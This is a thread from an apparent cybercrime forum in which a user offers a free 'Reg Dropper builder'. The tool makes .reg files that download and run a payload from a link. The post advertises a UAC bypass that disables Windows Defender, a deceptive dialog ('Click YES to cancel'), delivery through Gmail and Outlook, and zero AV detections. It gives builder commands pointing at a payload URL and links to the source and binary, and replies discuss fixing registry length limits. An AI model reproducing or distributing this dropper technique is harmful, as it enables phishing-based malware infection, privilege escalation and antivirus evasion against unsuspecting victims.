• XSS.stack #1 – первый литературный журнал от юзеров форума

Reg Dropper builder(Free & opensrc)

Отслеживать
DoKitO

DoKitO

(L2) cache
Пользователь
Регистрация
23.03.2022
Сообщения
304
Реакции
550
Гарант сделки
14
Hey guys,
First of all merry christmas to all of you
Today im here with a new project(inspiration of https://xss.pro/threads/76007/)

What Features does it has?​

✔️Gmail attachment​

Can be directly attached and sent by Gmail.

✔️ Outlook attachment​

Can be archived and then attached and sent by Outlook

✔️ UAC Bypass Exploit​

Reliable UAC bypass will escalate to Administrator and disables Windows Defender

✔️ Dialog Spoof​

.reg popup window will display a custom message. For example: "Click 'YES' to cancel."

✔️ Save Money on Crypters​

This dropper will protect your file from being scanned by Defender. Your crypts will last longer!

Detections​

0/30 at the time of publishing

https://www.virustotal.com/gui/file...a807832f2baa56b3efea3c2ef3169a78f43?nocache=1

Usage​

rust-reg-builder.exe <<direct_link> <output> </dialog_spoof_msg> </trashcode>
  • Dialog spoof & Trashcode are optional
Both are recommended to enable Trashcode is enabled by default

Example:

rust-reg-builder.exe http://1.1.1.1/a.exe out

rust-reg-buidler.exe http://1.1.1.1/a.exe out "Press YES to cancel" true


Source: http://bertylol.tech/root/rust-reg-builder (got high af, prob still good)
Compiled: http://bertylol.tech/root/rust-reg-builder/blob/master/rust-reg-builder.exe
Please note: This will take 1 restart to execute
Example Screen:

24cKvdA.png
 
Последнее редактирование:
LelouchZero сказал(а):
you sure that works? i'm pretty sure max reg string length is 255, this is beyond 255
Thats wrong, the max Size is 43679
 
Последнее редактирование:
DoKitO , I don't know what is your motivation to share all your work with us for free ... just want to say we are all grateful.
/I think I'm speaking on behalf of a lot of people here on the forum/
And I hope you continue doing it.
Thanks
 
LelouchZero сказал(а):
anything above 260 characters will not execute, you're probably using cmd to test and execute it which ignores the limit
Your right actually, I didnt tested it later on, I only made 1 run early in dev and overlooked it.
Fixed it now, also cmd on startup will now be hidden
 
kokoganev сказал(а):
DoKitO , I don't know what is your motivation to share all your work with us for free ... just want to say we are all grateful.
/I think I'm speaking on behalf of a lot of people here on the forum/
And I hope you continue doing it.
Thanks
Hope I'm not the only one whose shown their appreciation by making a donation ;-)
 
DimmuBurgor сказал(а):
Hope I'm not the only one whose shown their appreciation by making a donation ;-)
Yeah, everyone that having benefits from his /and not only his/ work should show their respect and donate.
This is the right thing to do.
Cheers
 
Последнее редактирование:
kokoganev сказал(а):
The post inspired DoKitO the creator over there says the he manage to remove UAC popup during reg opening https://xss.pro/threads/76007/post-543526 .
Is there a way to do it in DoKitO project too?
I got No Idea, i'll Look into it
 
инжинер сказал(а):
Смартскрин отключил ,пробовал на 64 и 32 винде 10 на виртуалке
app-cant-run-on-this-pc-message.png
Seems to work for me, maybe av
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх